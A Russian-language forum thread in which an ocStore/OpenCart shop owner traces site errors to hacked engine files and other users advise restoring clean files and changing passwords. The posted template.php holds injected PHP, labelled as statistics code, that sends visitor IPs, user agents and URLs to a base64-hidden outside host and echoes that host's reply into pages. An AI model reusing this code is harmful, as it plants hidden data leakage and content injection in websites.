Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

Проблема с куками и кодировкой


maxhit
 Share

Recommended Posts

Проблема с сайтом началась не так давно, и появилась сама по себе, без каких либо правок. Фото проблемы ниже. Причем выплывает она периодично, и только в браузере Firefox. Исправил путем закомментирования строк на которые он ругается. Я в php не силен. В чем может быть причина? Подскажите пожалуйста

 

Комменты ставил на следующие строки:

 

system/library/session.php

 

//if (!session_id()) {
            //ini_set('session.use_cookies', 'On');
            //ini_set('session.use_trans_sid', 'Off');
            
            //session_set_cookie_params(0, '/');
            //session_start();
        //}
 

system/library/template.php

if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
 


Второй блок кода комменты не хотел ставить. Я ставлю, перезаливаю файл, он вроде перезаливается. Но код остается прежним. Радует что ошибки исчезли.

 

Минус что корзина перестала работать :(

 

ef822f2a593b7d08b4c106636789928c.jpg

Link to comment
Share on other sites


Version 1.5.1.3 , качал с офф.сайта, русский опенкард

 

Может вирус какой-то, ведет себя подозрительно...

 

Сейчас разкомменитровал все блоки, и никакой ошибки. :mellow:  Я уже не знаю что и думать

Link to comment
Share on other sites


Движок ocStore Version 1.5.1.3. Качал от сюда - https://myopencart.com/. Давно это было.

 

Я вспомнил схожую проблему, она была с момента установки. При заходе в админке в раздел "Модули", получалось вот такое:

347ba5dd3b63f3905fc3ebd4c17858e8.jpg

 

 

Код в файле template.php довольно странный, похож на заразу :(

 

<?php
final class Template {
	public $data = array();
	
	public function fetch($filename) {
		$file = DIR_TEMPLATE . $filename;
    
		if (file_exists($file)) {
			extract($this->data);
			
      		ob_start();
      
	  		include($file);
      
	  		$content = ob_get_contents();

      		ob_end_clean();

      		return $content;
    	} else {
			trigger_error('Error: Could not load template ' . $file . '!');
			exit();				
    	}	
	}
}
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>
Link to comment
Share on other sites


вас похакали.

запросите у хостера логи доступа к ftp.

восстановите файлы магазина из бэкапа.

 

system/* можно вообще из оригинального архива движка восстановить (залить поверх с заменой).

Link to comment
Share on other sites

Ой, как же вовремя вы мне помогли.))) Данные доступа к FTP есть. Просто перезалить папку System? Брать с такой же версии движка? Или можно более новые?

 

Из бэкапа вы имеете ввиду посредством хостинга?

Link to comment
Share on other sites


запросите у хостера логи доступа к ftp.

это надо для анализа ситуации.
также сделайте бэкап файлов магазина для анализа.

= = =

 

Из бэкапа вы имеете ввиду посредством хостинга?

 

да.

 

Просто перезалить папку System? Брать с такой же версии движка? Или можно более новые?

 

только с той же версии.

Link to comment
Share on other sites

Бэкап уже заражен, на серваке хранят в течении 7 дней. :( . Этот код засунут почти во все файлы движка.

 

Я вот подумал, может проше поставить все на свежую и сделать импорт. Реально это?

Link to comment
Share on other sites


если у вас нет изменений - можно оригинальные файлы залить.

но лучше бы вам почистить комп, сменить пароли, слить файлы магазина себе, почистить их локально, залить на хостинг.

Link to comment
Share on other sites

Правильно я понял, если я перезалью по ftp все файлы на оригинал (с последней версии cms) то товары, картинки, страницы останутся прежними?

Link to comment
Share on other sites


Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.